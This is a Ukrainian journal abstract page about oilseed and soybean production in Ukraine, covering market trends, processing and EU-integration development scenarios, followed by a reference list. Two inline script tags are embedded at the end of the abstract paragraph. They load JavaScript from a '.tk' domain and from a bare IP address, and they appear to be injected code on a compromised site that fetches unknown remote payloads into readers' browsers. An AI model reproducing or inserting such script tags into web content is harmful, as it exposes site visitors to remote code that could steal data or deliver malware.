ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.3: 633.85
Економіка агропромислового виробництва

Виробництво олійних культур в Україні: сучасні виклики та перспективи / Петриченко В.Ф., Воронецька І.С. // Економіка АПК. - 2017. - № 10 - С. 32

Мета статті - моніторинг виробництва та реалізації олійних культур в Україні, дослідження основних проблем, визначення подальших перспектив і сценаріїв розвитку в умовах євроінтеграції. У процесі дослідження використано методи: діалектичний, монографічний, абстрактно-логічний, економіко-математичний, системний аналіз. Як елементи наукової новизни теоретично досліджено структурні зміни при виробництві й реалізації насіння та продуктів переробки олійних культур. Визначено цінові тенденції на внутрішньому й зовнішньому ринках. Розглянуто перспективи і стратегії розвитку олієжирової галузі та соєвиробництва з умовою виходу на світовий ринок. Як новизна дослідження - запропоновано сценарії сталого розвитку подій в агропромисловому виробництві на прикладі олієжирового й соєпродуктового підкомплексів в умовах євроінтеграційних процесів. За результатами дослідження обґрунтовано, що стратегічний розвиток олієжирового та соєпродуктового підкомплексів має бути спрямований на зменшення обсягів експорту сировинних ресурсів і створення умов для організації поглибленої переробки. Табл.: 4. Рис.: 6. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: олійні культури, кормовий білок, додана вартість, сценарії розвитку, олієжировий та соєпродуктовий підкомплекси

Список використаних джерел

 1. Бабич А.О. Світові ресурси рослинного білка / А.О. Бабич, А.А. Бабич-Побережна // Селекція і насінництво. - 2008. Вип. 96. - С. 215-222.
 2. Диденко Н. Проблема кормового белка в Украине / Н. Диденко, И. Воронецкая // Зерно. - 2014. - № 6 (99). - С.46-49.
 3. Діденко Н.І. Виробництво сої в умовах інтеграційних процесів в Україні / Н.І. Діденко // Економіка АПК. - 2017. - № 1. - С. 31-36.
 4. Іванюк С.В. Сучасна селекція сої [Електронний ресурс] / С.В. Іванюк // Агробізнес сьогодні. - 2014. - №17(288). - Режим доступу до ресурсу: http://agro-business.com.ua/agronomiia-siogodni/.
 5. Інформаційно-аналітичне агентство «АПК-Інформ» [Електронний ресурс]. - Режим доступу : www.apk-inform.com
 6. Маслак О. Перспективи вирощування та реалізації ріпаку / О. Маслак // Пропозиція. - № 13(332) лип. 2016. - Режим доступу до ресурсу: http://propozitsiya.com/ua/.
 7. Могилянська Н.О. Сучасний стан і перспективи переробки олійних культур / Н.О. Могилянська // Зернові продукти і комбікорми. - 2014. - № 1 (53). - С. 22-25.
 8. Офіційний веб-сайт Державної служби статистики України [Електронний ресурс]. - Режим доступу : http://www.ukrstat.gov.ua/.
 9. Петриченко В.Ф. Наукові основи виробництва та використання сої у тваринництві / В.Ф. Петриченко // Корми і кормовиробництво. - 2012. - Вип. 71. - С. 3-11.
 10. Петриченко В.Ф. Наукові основи сучасних технологій вирощування високобілкових культур / В.Ф. Петриченко // Вісн. аграр. науки. - 2003. - № 10. - С. 15-19.
 11. Петриченко В.Ф. Рослинництво. Технологія вирощування сільськогосподарських культур: навч. посіб. / В.Ф. Петриченко, В.В. Лихочвор - 4-те вид. - Львів: НВФ «Українські технології», 2014. - 1040 с.
 12. Чехов С.А. Основні тенденції розвитку ринку олійних культур в Україні / С.А. Чехов, І.В. Чехова // Продуктивність агропромислового виробництва : наук.-практ. зб. ; НДІ «Украгропромпродуктивність». - 2014. - № 25. - С. 71-78.
 13. Чехова І. Ринок ріпаку змінює вектори розвитку / І. Чехова, С. Чехов // Пропозиція. - 2017. - № 1 (257). - С. 156-159.
 14. Шаймухаметова В. Реалії олійного ринку України [Електронний ресурс] / В. Шаймухаметова. - Агроризик // Режим доступу до ресурсу: http://agrorisk.biz/realii-oliynogo-rinku-ukraini/
 15. Oilseeds: Worlds Markets and Trade / United States Department of Agriculture Foreign Agricultural Service Approved by the World Agricultural Outlook Board // USDA/ - July 2017. - 38 p.
 16. Pilorgé E. Foresight for plant oils and proteins 2030 [Електронний ресурс] / E. Pilorgé, A. Daouhadi, F. Muel, A.-M. Tremblay// Terres Inovia , 2016. - 48 p. Режим доступу до ресурсу : http://www.terresinovia.fr/fileadmin.